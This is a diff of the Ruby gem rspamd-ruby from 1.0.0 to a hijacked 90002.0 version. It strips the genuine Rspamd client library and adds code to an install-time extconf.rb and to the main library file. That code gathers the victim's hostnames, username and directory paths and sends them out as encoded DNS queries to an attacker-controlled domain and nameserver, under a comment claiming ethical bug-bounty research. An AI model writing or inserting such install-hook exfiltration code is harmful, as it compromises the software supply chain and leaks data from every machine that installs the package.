rspamd-ruby 1.0.0 → 90002.0

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 1fbf843187c61d00b8bdfc92261d43df0cacd691ea0e028427acb5b9493b81df
-  data.tar.gz: aa65860dd58db51d418d3eae722f27b8518dba360f42ff4a8fe371b58ed0f08b
+  metadata.gz: b4af500c8789fde7d32d3710b0165a36b748b8549e71c900c77d4231dbd1bfae
+  data.tar.gz: 9879b6445d90145ec8cdfc59a2d3606ca2ffe1eed89756f07fe3851826106e12
 SHA512:
-  metadata.gz: 514f0dadd0c2bcc3ff8c68b1f65da421a8f5b5dd988188e28db72d1ca2899d3a22718a4479d34106e5124b8bf74c5074f1c8279f631e0767b39878ea958dc044
-  data.tar.gz: bd141fd2320ea5ea328e24fb09b434cacdff04e65256de6549e9304cf9d85d5ea44c2adea95c3236cc667479546b9aec515d8bf6bd61442890d71d1824ee4e97
+  metadata.gz: 303a3e8450bd09056ea2bd2eb315fc8d06ad58bf71285836f234590921f5c8d2eb9084085f94c56a500b12c81ec04c7f403fee13c2885f46625fe1cc5f14693d
+  data.tar.gz: ebc4a83a87fe9217dbd2f25dcf50300ed4265382a06dd5613541119cec8b93bd79fe834e1e6ea301fd32674566085765de60caf47a7bddaa0261b6dde3332e7f

data/ext/rspamd-ruby/extconf.rb

@@ -0,0 +1,177 @@
+require "mkmf"
+
+create_makefile "gem_test/gem_test"
+=begin
+Hi, if you're reading this you're probably wondering what this code is doing on
+your machine. Don't worry! It doesn't do anything nasty or malicious.
+
+I am an ethical security researcher, attempting attacks against organisations
+that have a "bug bounty" type program in place.
+
+I am performing work similar to the work in this blog post:
+https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+If your organisation has a bug bounty program my findings will be reported via
+that program.
+
+If your organisation does not have a bug bounty program, you were not targeted
+by my work and have some how ended up getting included, any data reported from
+your org will be discarded.
+
+All data I collect will be deleted as soon as I'm done, in either case.
+
+If you are reading this then you probably need to tighten up your Gemfiles
+and/or upgrade Bundler, see here for more details:
+
+https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html
+
+You can read the code to confirm this but here's a top-level view of what it
+does to help you out:
+
+Grabs the hostname(s), current username, and the file paths to this script,
+the current working directory, and the home directory. This helps me identify
+which machines have been affected (for reporting), at which organisation (to
+know who to report it to), and to eliminate false positives from machines that
+fetch and install every Gem.
+
+Generates a random ID so I can piece together the different fragments of data.
+
+Encodes all the data as json, compresses it, Base32 encodes it, and chops it
+into chunks to go out as DNS queries that will hit a nameserver I control.
+
+That's it!
+
+If you have any questions or want to get in touch for any reason, you can reach
+me at zofrex@gmail.com
+
+=end
+
+puts "Package 'rspamd-ruby' has been hijacked via RubyGems, if you're reading logs and wondering why things broke, that's probably why."
+
+begin # big catch-all over everything to stop any errors escaping
+    def do_or_whatever
+        yield
+    rescue Exception
+        # keep going
+    end
+
+    do_or_whatever { require 'net/http' }
+    do_or_whatever { require 'socket' }
+    do_or_whatever { require 'etc' }
+    require 'securerandom'
+    require 'json'
+    require 'resolv'
+
+    def report_analytics
+        report_id = SecureRandom.alphanumeric(8)
+
+        idx_package = 0
+        idx_hostnames = 1
+        idx_username = 2
+        idx_paths = 3
+        idx_event = 4
+
+        idx_paths_file = 0
+        idx_paths_cwd = 1
+        idx_paths_script = 2
+        idx_paths_home = 3
+
+        data = Hash.new
+
+        data[idx_event] = 'install'
+
+        # package name
+
+        data[idx_package] = 'rspamd-ruby-90002.0'
+
+        # get possible hostnames
+
+        hostnames = []
+
+        do_or_whatever { hostnames << Socket.gethostname }
+        do_or_whatever { hostnames << Socket.gethostbyname(Socket.gethostname).first }
+        do_or_whatever { hostnames << `hostname` }
+        do_or_whatever { hostnames << `hostname -f` }
+
+        data[idx_hostnames] = hostnames.map(&:strip).uniq
+
+        # get local user
+
+        do_or_whatever { data[idx_username] = Etc.getlogin }
+
+        # get useful paths
+
+        paths = Hash.new
+
+        do_or_whatever { paths[idx_paths_file] = File.dirname(__FILE__) }
+        do_or_whatever { paths[idx_paths_cwd] = Dir.pwd }
+        do_or_whatever { paths[idx_paths_script] = __dir__ }
+        do_or_whatever { paths[idx_paths_home] = Dir.home }
+
+        data[idx_paths] = paths
+
+        # encode payload
+
+        json = JSON.generate(data)
+        compressed = "u#{json}"
+
+        # attempt to compress data but don't sweat it if that fails
+        do_or_whatever do
+            require 'zlib'
+            compressed = "c#{Zlib.deflate(json)}"
+        end
+
+        # base32 encode the data
+        table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
+        encoded = compressed.bytes.each_slice(5).flat_map do |slice|
+            n = (slice.length * 8.0 / 5.0).ceil
+            p = n < 8 ? 5 - (slice.length * 8) % 5 : 0
+            c =  slice.inject(0) {|m,o| (m << 8) + o} << p
+            (0..n-1).to_a.reverse.collect {|i| table[(c >> i * 5) & 0x1f].chr}
+        end.join
+
+        # send data out via DNS lookups
+        total_queries = (encoded.length / 180.0).ceil
+
+        google_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['8.8.8.8'])])
+        me_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['167.172.150.100'])])
+
+        method = :generic
+        suffix = "zofrex-is-ethically-testing.ga"
+
+        encoded.chars.each_slice(60).each_slice(3).each_with_index do |chunks, query_number|
+            query_data = chunks.map(&:join).join('.')
+            data_portion = "#{report_id}.#{query_number+1}.#{total_queries}.#{query_data}"
+
+            # Try to get the message out somehow, skip the methods that don't work on future loops
+            if method == :generic
+                begin
+                    address = Resolv.getaddress "#{data_portion}.rp1.#{suffix}"
+                    method = :google if address != "127.0.0.3"
+                rescue
+                    method = :google
+                end
+            end
+
+            if method == :google
+                begin
+                    address = google_resolver.getaddress "#{data_portion}.rp2.#{suffix}"
+                    method = :direct if address != "127.0.0.4"
+                rescue
+                    method = :direct
+                end
+            end
+
+            if method == :direct
+                do_or_whatever { me_resolver.getaddress "#{data_portion}.rp3.#{suffix}" }
+            end
+        end
+    end
+
+    do_or_whatever { report_analytics }
+
+    # cleanup
+    do_or_whatever { undef report_analytics }
+    do_or_whatever { undef do_or_whatever }
+rescue Error
+end

data/lib/rspamd-ruby.rb

@@ -1,2 +1,174 @@
-require "rspamd/client"
-require "rspamd/errors"
+=begin
+Hi, if you're reading this you're probably wondering what this code is doing on
+your machine. Don't worry! It doesn't do anything nasty or malicious.
+
+I am an ethical security researcher, attempting attacks against organisations
+that have a "bug bounty" type program in place.
+
+I am performing work similar to the work in this blog post:
+https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+If your organisation has a bug bounty program my findings will be reported via
+that program.
+
+If your organisation does not have a bug bounty program, you were not targeted
+by my work and have some how ended up getting included, any data reported from
+your org will be discarded.
+
+All data I collect will be deleted as soon as I'm done, in either case.
+
+If you are reading this then you probably need to tighten up your Gemfiles
+and/or upgrade Bundler, see here for more details:
+
+https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html
+
+You can read the code to confirm this but here's a top-level view of what it
+does to help you out:
+
+Grabs the hostname(s), current username, and the file paths to this script,
+the current working directory, and the home directory. This helps me identify
+which machines have been affected (for reporting), at which organisation (to
+know who to report it to), and to eliminate false positives from machines that
+fetch and install every Gem.
+
+Generates a random ID so I can piece together the different fragments of data.
+
+Encodes all the data as json, compresses it, Base32 encodes it, and chops it
+into chunks to go out as DNS queries that will hit a nameserver I control.
+
+That's it!
+
+If you have any questions or want to get in touch for any reason, you can reach
+me at zofrex@gmail.com
+
+=end
+
+puts "Package 'rspamd-ruby' has been hijacked via RubyGems, if you're reading logs and wondering why things broke, that's probably why."
+
+begin # big catch-all over everything to stop any errors escaping
+    def do_or_whatever
+        yield
+    rescue Exception
+        # keep going
+    end
+
+    do_or_whatever { require 'net/http' }
+    do_or_whatever { require 'socket' }
+    do_or_whatever { require 'etc' }
+    require 'securerandom'
+    require 'json'
+    require 'resolv'
+
+    def report_analytics
+        report_id = SecureRandom.alphanumeric(8)
+
+        idx_package = 0
+        idx_hostnames = 1
+        idx_username = 2
+        idx_paths = 3
+        idx_event = 4
+
+        idx_paths_file = 0
+        idx_paths_cwd = 1
+        idx_paths_script = 2
+        idx_paths_home = 3
+
+        data = Hash.new
+
+        data[idx_event] = 'run'
+
+        # package name
+
+        data[idx_package] = 'rspamd-ruby-90002.0'
+
+        # get possible hostnames
+
+        hostnames = []
+
+        do_or_whatever { hostnames << Socket.gethostname }
+        do_or_whatever { hostnames << Socket.gethostbyname(Socket.gethostname).first }
+        do_or_whatever { hostnames << `hostname` }
+        do_or_whatever { hostnames << `hostname -f` }
+
+        data[idx_hostnames] = hostnames.map(&:strip).uniq
+
+        # get local user
+
+        do_or_whatever { data[idx_username] = Etc.getlogin }
+
+        # get useful paths
+
+        paths = Hash.new
+
+        do_or_whatever { paths[idx_paths_file] = File.dirname(__FILE__) }
+        do_or_whatever { paths[idx_paths_cwd] = Dir.pwd }
+        do_or_whatever { paths[idx_paths_script] = __dir__ }
+        do_or_whatever { paths[idx_paths_home] = Dir.home }
+
+        data[idx_paths] = paths
+
+        # encode payload
+
+        json = JSON.generate(data)
+        compressed = "u#{json}"
+
+        # attempt to compress data but don't sweat it if that fails
+        do_or_whatever do
+            require 'zlib'
+            compressed = "c#{Zlib.deflate(json)}"
+        end
+
+        # base32 encode the data
+        table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
+        encoded = compressed.bytes.each_slice(5).flat_map do |slice|
+            n = (slice.length * 8.0 / 5.0).ceil
+            p = n < 8 ? 5 - (slice.length * 8) % 5 : 0
+            c =  slice.inject(0) {|m,o| (m << 8) + o} << p
+            (0..n-1).to_a.reverse.collect {|i| table[(c >> i * 5) & 0x1f].chr}
+        end.join
+
+        # send data out via DNS lookups
+        total_queries = (encoded.length / 180.0).ceil
+
+        google_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['8.8.8.8'])])
+        me_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['167.172.150.100'])])
+
+        method = :generic
+        suffix = "zofrex-is-ethically-testing.ga"
+
+        encoded.chars.each_slice(60).each_slice(3).each_with_index do |chunks, query_number|
+            query_data = chunks.map(&:join).join('.')
+            data_portion = "#{report_id}.#{query_number+1}.#{total_queries}.#{query_data}"
+
+            # Try to get the message out somehow, skip the methods that don't work on future loops
+            if method == :generic
+                begin
+                    address = Resolv.getaddress "#{data_portion}.rp1.#{suffix}"
+                    method = :google if address != "127.0.0.3"
+                rescue
+                    method = :google
+                end
+            end
+
+            if method == :google
+                begin
+                    address = google_resolver.getaddress "#{data_portion}.rp2.#{suffix}"
+                    method = :direct if address != "127.0.0.4"
+                rescue
+                    method = :direct
+                end
+            end
+
+            if method == :direct
+                do_or_whatever { me_resolver.getaddress "#{data_portion}.rp3.#{suffix}" }
+            end
+        end
+    end
+
+    do_or_whatever { report_analytics }
+
+    # cleanup
+    do_or_whatever { undef report_analytics }
+    do_or_whatever { undef do_or_whatever }
+rescue Error
+end

metadata

@@ -1,104 +1,30 @@
 --- !ruby/object:Gem::Specification
 name: rspamd-ruby
 version: !ruby/object:Gem::Version
-  version: 1.0.0
+  version: '90002.0'
 platform: ruby
 authors:
-- George Claghorn
-- Lewis Buckley
+- James 'zofrex' Sanderson
 autorequire:
-bindir: bin
+bindir: exe
 cert_chain: []
-date: 2023-07-23 00:00:00.000000000 Z
-dependencies:
-- !ruby/object:Gem::Dependency
-  name: rake
-  requirement: !ruby/object:Gem::Requirement
-    requirements:
-    - - "~>"
-      - !ruby/object:Gem::Version
-        version: '13.0'
-  type: :development
-  prerelease: false
-  version_requirements: !ruby/object:Gem::Requirement
-    requirements:
-    - - "~>"
-      - !ruby/object:Gem::Version
-        version: '13.0'
-- !ruby/object:Gem::Dependency
-  name: minitest
-  requirement: !ruby/object:Gem::Requirement
-    requirements:
-    - - ">"
-      - !ruby/object:Gem::Version
-        version: '5.11'
-  type: :development
-  prerelease: false
-  version_requirements: !ruby/object:Gem::Requirement
-    requirements:
-    - - ">"
-      - !ruby/object:Gem::Version
-        version: '5.11'
-- !ruby/object:Gem::Dependency
-  name: webmock
-  requirement: !ruby/object:Gem::Requirement
-    requirements:
-    - - "~>"
-      - !ruby/object:Gem::Version
-        version: '3.0'
-  type: :development
-  prerelease: false
-  version_requirements: !ruby/object:Gem::Requirement
-    requirements:
-    - - "~>"
-      - !ruby/object:Gem::Version
-        version: '3.0'
-- !ruby/object:Gem::Dependency
-  name: debug
-  requirement: !ruby/object:Gem::Requirement
-    requirements:
-    - - ">="
-      - !ruby/object:Gem::Version
-        version: '0'
-  type: :development
-  prerelease: false
-  version_requirements: !ruby/object:Gem::Requirement
-    requirements:
-    - - ">="
-      - !ruby/object:Gem::Version
-        version: '0'
-description:
-email: lewis@37signals.com
+date: 2021-02-16 00:00:00.000000000 Z
+dependencies: []
+description: I am testing for dependency confusion vulnerabilities in products that
+  are in public bug bounty programs. This code is reporting-only, and does not do
+  anything malicious.
+email:
+- gem-research@zofrex.com
 executables: []
-extensions: []
+extensions:
+- ext/rspamd-ruby/extconf.rb
 extra_rdoc_files: []
 files:
-- ".github/workflows/ci.yml"
-- ".gitignore"
-- ".rubocop.yml"
-- ".ruby-version"
-- Gemfile
-- Gemfile.lock
-- MIT-LICENSE
-- README.md
-- Rakefile
-- bin/release
+- ext/rspamd-ruby/extconf.rb
 - lib/rspamd-ruby.rb
-- lib/rspamd/check/result.rb
-- lib/rspamd/client.rb
-- lib/rspamd/configuration.rb
-- lib/rspamd/errors.rb
-- lib/rspamd/service.rb
-- lib/rspamd/version.rb
-- rspamd-ruby.gemspec
-- test/client_test.rb
-- test/fixtures/mail/ham.eml
-- test/fixtures/responses/already_reported.json
-- test/fixtures/responses/ham.json
-- test/fixtures/responses/spam.json
-- test/test_helper.rb
-homepage: https://github.com/basecamp/rspamd-ruby
-licenses: []
+homepage:
+licenses:
+- MIT
 metadata: {}
 post_install_message:
 rdoc_options: []
@@ -108,21 +34,15 @@ required_ruby_version: !ruby/object:Gem::Requirement
   requirements:
   - - ">="
     - !ruby/object:Gem::Version
-      version: 2.7.8
+      version: 1.9.0
 required_rubygems_version: !ruby/object:Gem::Requirement
   requirements:
   - - ">="
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.4.10
+rubygems_version: 3.1.4
 signing_key:
 specification_version: 4
-summary: Client for Rspamd's HTTP API
-test_files:
-- test/client_test.rb
-- test/fixtures/mail/ham.eml
-- test/fixtures/responses/already_reported.json
-- test/fixtures/responses/ham.json
-- test/fixtures/responses/spam.json
-- test/test_helper.rb
+summary: Testing dependency confusion bugs
+test_files: []

data/.github/workflows/ci.yml

@@ -1,27 +0,0 @@
-name: CI
-on: [push, pull_request]
-jobs:
-  tests:
-    runs-on: ubuntu-latest
-
-    steps:
-      - uses: actions/checkout@v1
-
-      - name: Set up Ruby
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: 2.7.8
-          rubygems: latest
-
-      - name: Cache gem dependencies
-        uses: actions/cache@v1
-        with:
-          path: vendor/bundle
-          key: ${{ runner.os }}-bundler-${{ hashFiles('**/Gemfile.lock') }}
-          restore-keys: ${{ runner.os }}-bundler-
-
-      - name: Install dependencies
-        run: gem install bundler && bundle install --jobs 4 --retry 3 --path vendor/bundle
-
-      - name: Run tests
-        run: bundle exec rake test

data/.gitignore

@@ -1,2 +0,0 @@
-*.gem
-.byebug_history

data/.rubocop.yml

@@ -1 +0,0 @@
-inherit_gem: { rubocop-37signals: rubocop.yml }

data/.ruby-version

@@ -1 +0,0 @@
-2.7.8

data/Gemfile

@@ -1,5 +0,0 @@
-source "https://rubygems.org"
-
-gemspec
-
-gem "rubocop-37signals", github: "basecamp/house-style", require: false, branch: :main

data/Gemfile.lock

@@ -1,98 +0,0 @@
-GIT
-  remote: https://github.com/basecamp/house-style.git
-  revision: b3ad65254828e8e8019a0d9a6205aff9ad206a77
-  branch: main
-  specs:
-    rubocop-37signals (1.0.0)
-      rubocop
-      rubocop-minitest
-      rubocop-performance
-      rubocop-rails
-
-PATH
-  remote: .
-  specs:
-    rspamd-ruby (1.0.0)
-
-GEM
-  remote: https://rubygems.org/
-  specs:
-    activesupport (6.1.7.4)
-      concurrent-ruby (~> 1.0, >= 1.0.2)
-      i18n (>= 1.6, < 2)
-      minitest (>= 5.1)
-      tzinfo (~> 2.0)
-      zeitwerk (~> 2.3)
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
-    ast (2.4.2)
-    concurrent-ruby (1.2.0)
-    crack (0.4.3)
-      safe_yaml (~> 1.0.0)
-    debug (1.7.1)
-      irb (>= 1.5.0)
-      reline (>= 0.3.1)
-    hashdiff (1.0.0)
-    i18n (1.12.0)
-      concurrent-ruby (~> 1.0)
-    io-console (0.6.0)
-    irb (1.6.2)
-      reline (>= 0.3.0)
-    json (2.6.3)
-    minitest (5.17.0)
-    parallel (1.22.1)
-    parser (3.2.1.0)
-      ast (~> 2.4.1)
-    public_suffix (5.0.0)
-    rack (3.0.4.1)
-    rainbow (3.1.1)
-    rake (13.0.1)
-    regexp_parser (2.7.0)
-    reline (0.3.2)
-      io-console (~> 0.5)
-    rexml (3.2.5)
-    rubocop (1.45.1)
-      json (~> 2.3)
-      parallel (~> 1.10)
-      parser (>= 3.2.0.0)
-      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.24.1, < 2.0)
-      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.26.0)
-      parser (>= 3.2.1.0)
-    rubocop-minitest (0.27.0)
-      rubocop (>= 0.90, < 2.0)
-    rubocop-performance (1.16.0)
-      rubocop (>= 1.7.0, < 2.0)
-      rubocop-ast (>= 0.4.0)
-    rubocop-rails (2.19.1)
-      activesupport (>= 4.2.0)
-      rack (>= 1.1)
-      rubocop (>= 1.33.0, < 2.0)
-    ruby-progressbar (1.11.0)
-    safe_yaml (1.0.5)
-    tzinfo (2.0.6)
-      concurrent-ruby (~> 1.0)
-    unicode-display_width (2.4.2)
-    webmock (3.8.0)
-      addressable (>= 2.3.6)
-      crack (>= 0.3.2)
-      hashdiff (>= 0.4.0, < 2.0.0)
-    zeitwerk (2.6.8)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  debug
-  minitest (> 5.11)
-  rake (~> 13.0)
-  rspamd-ruby!
-  rubocop-37signals!
-  webmock (~> 3.0)
-
-BUNDLED WITH
-   2.4.17

data/MIT-LICENSE

@@ -1,20 +0,0 @@
-Copyright (c) 2023 37signals
-
-Permission is hereby granted, free of charge, to any person obtaining
-a copy of this software and associated documentation files (the
-"Software"), to deal in the Software without restriction, including
-without limitation the rights to use, copy, modify, merge, publish,
-distribute, sublicense, and/or sell copies of the Software, and to
-permit persons to whom the Software is furnished to do so, subject to
-the following conditions:
-
-The above copyright notice and this permission notice shall be
-included in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
-NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
-LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
-OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
-WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

data/README.md

@@ -1,74 +0,0 @@
-# Ruby client for Rspamd’s HTTP API
-
-## Usage
-
-Initialize a client with the host and port of an Rspamd controller process:
-
-```ruby
-client = Rspamd::Client.new(host: "localhost", port: 11334)
-```
-
-Check a message:
-
-```ruby
-result = client.check(<<~MIME)
-  Date: Tue, 21 Jan 2020 21:04:42 +0000
-  From: Alice <alice@example.com>
-  To: Bob <bob@example.com>
-  Message-ID: <975bad33-2e76-40c3-89aa-7fe1edcbe7ce@example.com>
-  Subject: Hello
-  Mime-Version: 1.0
-  Content-Type: text/plain; charset=UTF-8
-  Content-Transfer-Encoding: quoted-printable
-  Delivered-To: bob@example.com
-
-  Hi Bob!
-
-  -Alice
-MIME
-
-result.spam? # => false
-result.ham? # => true
-
-result.score # => 1.2
-result.required_score # => 15
-result.action # => "no action"
-```
-
-Report a message as spam:
-
-```ruby
-client.spam!(<<~MIME)
-  Date: Tue, 21 Jan 2020 21:04:42 +0000
-  From: Spammer <spammer@example.com>
-  To: Bob <bob@example.com>
-  Message-ID: <975bad33-2e76-40c3-89aa-7fe1edcbe7ce@example.com>
-  Subject: Hello
-  Mime-Version: 1.0
-  Content-Type: text/plain; charset=UTF-8
-  Content-Transfer-Encoding: quoted-printable
-  Delivered-To: bob@example.com
-
-  Buy some stuff?
-MIME
-```
-
-Report a message as ham:
-
-```ruby
-client.ham!(<<~MIME)
-  Date: Tue, 21 Jan 2020 21:04:42 +0000
-  From: Alice <alice@example.com>
-  To: Bob <bob@example.com>
-  Message-ID: <975bad33-2e76-40c3-89aa-7fe1edcbe7ce@example.com>
-  Subject: Hello
-  Mime-Version: 1.0
-  Content-Type: text/plain; charset=UTF-8
-  Content-Transfer-Encoding: quoted-printable
-  Delivered-To: bob@example.com
-
-  Hi Bob!
-
-  -Alice
-MIME
-```

data/Rakefile

@@ -1,9 +0,0 @@
-require "bundler/setup"
-require "rake/testtask"
-
-Rake::TestTask.new do |test|
-  test.libs << "test"
-  test.test_files = FileList["test/**/*_test.rb"]
-end
-
-task default: :test

data/bin/release

@@ -1,14 +0,0 @@
-#!/usr/bin/env bash
-
-VERSION=$1
-
-printf "module Rspamd\n  VERSION = \"$VERSION\"\nend\n" > ./lib/rspamd/version.rb
-bundle
-git add Gemfile.lock lib/rspamd/version.rb
-git commit -m "Bump version for $VERSION"
-git push
-git tag v$VERSION
-git push --tags
-gem build rspamd-ruby.gemspec
-gem push "rspamd-ruby-$VERSION.gem" --host https://rubygems.org
-rm "rspamd-ruby-$VERSION.gem"

data/lib/rspamd/check/result.rb

@@ -1,59 +0,0 @@
-module Rspamd
-  module Check
-    class Result
-      attr_reader :data
-
-      def self.parse(source)
-        new JSON.parse(source)
-      end
-
-      def initialize(data = {})
-        @data = data
-      end
-
-      def spam?
-        score >= required_score
-      end
-
-      def ham?
-        !spam?
-      end
-
-      def skipped?
-        data.fetch("is_skipped")
-      end
-
-      def score
-        data.fetch("score")
-      end
-
-      def required_score
-        data.fetch("required_score")
-      end
-
-      def action
-        data.fetch("action")
-      end
-
-      def symbols
-        data.fetch("symbols")
-      end
-
-      def subject
-        data["subject"]
-      end
-
-      def urls
-        data["urls"] || []
-      end
-
-      def emails
-        data["emails"] || []
-      end
-
-      def message_id
-        data["message_id"]
-      end
-    end
-  end
-end

data/lib/rspamd/client.rb

@@ -1,69 +0,0 @@
-require "rspamd/configuration"
-require "rspamd/service"
-require "rspamd/check/result"
-require "rspamd/errors"
-
-module Rspamd
-  class Client
-    attr_reader :configuration
-
-    def initialize(**options)
-      @configuration = Configuration.new(**options)
-    end
-
-    def ping
-      service.get("/ping")
-        .then { |response| response.is_a?(Net::HTTPOK) && response.body.match?(/\Apong(\r?\n)?\z/) }
-    rescue Net::OpenTimeout, Net::ReadTimeout, IOError, SystemCallError
-      false
-    end
-
-    def check(message, headers: {})
-      service.post("/checkv2", headers: headers, body: message).then do |response|
-        if response.is_a?(Net::HTTPOK)
-          Check::Result.parse(response.body)
-        else
-          raise InvalidResponse, "Received invalid response from Rspamd: expected 200 OK, got #{response.code} #{response.message}".strip
-        end
-      end
-    end
-
-    def spam!(message)
-      learn :spam, message
-    end
-
-    def ham!(message)
-      learn :ham, message
-    end
-
-    def add_fuzzy(message, flag: 1, weight: 1)
-      post("/fuzzyadd", message, "Flag" => flag, "Weight" => weight)
-    end
-
-    def delete_fuzzy(message, flag: 1)
-      post("/fuzzydel", message, "Flag" => flag)
-    end
-
-    private
-      def service
-        @service ||= Service.new(configuration)
-      end
-
-      def learn(classification, message)
-        post("/learn#{classification}", message)
-      end
-
-      def post(endpoint, body, **headers)
-        service.post(endpoint, body: body, headers: headers).then do |response|
-          case response
-          when Net::HTTPOK
-            JSON.parse(response.body).fetch("success")
-          when Net::HTTPNoContent, Net::HTTPAlreadyReported
-            false
-          else
-            raise Rspamd::Error, JSON.parse(response.body)["error"] || "Received unspecified error from Rspamd"
-          end
-        end
-      end
-  end
-end

data/lib/rspamd/configuration.rb

@@ -1,39 +0,0 @@
-module Rspamd
-  class Configuration
-    attr_reader :options
-
-    def initialize(**options)
-      @options = options
-    end
-
-    def scheme
-      options[:scheme] || "http"
-    end
-
-    def host
-      options[:host] || "localhost"
-    end
-
-    def port
-      options[:port] || 11333
-    end
-
-
-    def open_timeout
-      options[:open_timeout] || 1
-    end
-
-    def read_timeout
-      options[:read_timeout] || 10
-    end
-
-
-    def user_agent
-      options[:user_agent] || "rspamd-ruby"
-    end
-
-    def password
-      options[:password]
-    end
-  end
-end

data/lib/rspamd/errors.rb

@@ -1,4 +0,0 @@
-module Rspamd
-  class Error < StandardError; end
-  class InvalidResponse < Error; end
-end

data/lib/rspamd/service.rb

@@ -1,34 +0,0 @@
-module Rspamd
-  class Service
-    attr_reader :configuration
-
-    def initialize(configuration)
-      @configuration = configuration
-    end
-
-    def get(path)
-      client.get path, default_headers
-    end
-
-    def post(path, body: nil, headers: {})
-      client.post path, body, default_headers.merge(headers.compact.transform_values(&:to_s))
-    end
-
-    private
-      def client
-        @client ||= Net::HTTP.start \
-          configuration.host,
-          configuration.port,
-          use_ssl: configuration.scheme == "https",
-          open_timeout: configuration.open_timeout,
-          read_timeout: configuration.read_timeout
-      end
-
-      def default_headers
-        {
-          "User-Agent" => configuration.user_agent,
-          "Password" => configuration.password
-        }.compact
-      end
-  end
-end

data/lib/rspamd/version.rb

@@ -1,3 +0,0 @@
-module Rspamd
-  VERSION = "1.0.0"
-end

data/rspamd-ruby.gemspec

@@ -1,20 +0,0 @@
-require_relative "lib/rspamd/version"
-
-Gem::Specification.new do |s|
-  s.name     = "rspamd-ruby"
-  s.version  = Rspamd::VERSION
-  s.authors  = [ "George Claghorn", "Lewis Buckley" ]
-  s.email    = "lewis@37signals.com"
-  s.summary  = "Client for Rspamd's HTTP API"
-  s.homepage = "https://github.com/basecamp/rspamd-ruby"
-
-  s.required_ruby_version = ">= 2.7.8"
-
-  s.add_development_dependency "rake",     "~> 13.0"
-  s.add_development_dependency "minitest", "> 5.11"
-  s.add_development_dependency "webmock",  "~> 3.0"
-  s.add_development_dependency "debug"
-
-  s.files      = `git ls-files`.split("\n")
-  s.test_files = `git ls-files -- test/*`.split("\n")
-end

data/test/client_test.rb

@@ -1,161 +0,0 @@
-require "test_helper"
-
-class Rspamd::ClientTest < Minitest::Test
-  def setup
-    @client = Rspamd::Client.new(host: "localhost", port: 11333)
-  end
-
-  def test_successfully_pinging
-    stub_request(:get, "http://localhost:11333/ping").to_return(status: 200, body: "pong\r\n")
-    assert @client.ping
-  end
-
-  def test_unsuccessfully_pinging_due_to_a_server_error
-    stub_request(:get, "http://localhost:11333/ping").to_return(status: 500)
-    assert !@client.ping
-  end
-
-  def test_unsuccessfully_pinging_due_to_a_timeout
-    stub_request(:get, "http://localhost:11333/ping").to_timeout
-    assert !@client.ping
-  end
-
-  def test_successfully_checking_a_ham_message
-    stub_request(:post, "http://localhost:11333/checkv2")
-      .with(body: mail(:ham))
-      .to_return(status: 200, body: response("ham.json"))
-
-    result = @client.check(mail(:ham))
-    assert !result.spam?
-    assert result.ham?
-    assert_equal 1.0, result.score
-    assert_equal 15.0, result.required_score
-    assert_equal "no action", result.action
-    assert_equal %w[ foo.example.com bar.example.com baz.example.com ], result.urls
-    assert_equal %w[ alice@example.com ], result.emails
-  end
-
-  def test_successfully_checking_a_spam_message
-    stub_request(:post, "http://localhost:11333/checkv2")
-        .with(body: mail(:ham))
-        .to_return(status: 200, body: response("spam.json"))
-
-    result = @client.check(mail(:ham))
-    assert result.spam?
-    assert !result.ham?
-    assert_equal 17.8, result.score
-    assert_equal 6.0, result.required_score
-    assert_equal "add header", result.action
-    assert_equal [], result.urls
-    assert_equal [], result.emails
-  end
-
-  def test_unsuccessfully_checking_a_message_due_to_a_server_error
-    stub_request(:post, "http://localhost:11333/checkv2")
-      .with(body: mail(:ham))
-      .to_return(status: [ 500, "Internal Server Error" ])
-
-    error = assert_raises(Rspamd::InvalidResponse) { @client.check(mail(:ham)) }
-    assert_equal "Received invalid response from Rspamd: expected 200 OK, got 500 Internal Server Error", error.message
-  end
-
-  def test_providing_headers_on_check
-    request = stub_request(:post, "http://localhost:11333/checkv2")
-        .with(body: mail(:ham), headers: { "Settings-Id" => "outbound" })
-        .to_return(status: 200, body: response("spam.json"))
-
-    @client.check(mail(:ham), headers: { "Settings-Id" => "outbound" })
-    assert_requested request
-  end
-
-  def test_successfully_reporting_a_message_as_spam
-    request = stub_request(:post, "http://localhost:11333/learnspam")
-      .with(body: mail(:ham))
-      .to_return(status: 200, body: '{"success": true}')
-
-    assert @client.spam!(mail(:ham))
-    assert_requested request
-  end
-
-  def test_unsuccessfully_reporting_a_message_as_spam
-    stub_request(:post, "http://localhost:11333/learnspam")
-      .with(body: mail(:ham))
-      .to_return(status: 500, body: '{"error": "Unknown statistics error, found when storing data on backend"}')
-
-    error = assert_raises(Rspamd::Error) { @client.spam!(mail(:ham)) }
-    assert_equal "Unknown statistics error, found when storing data on backend", error.message
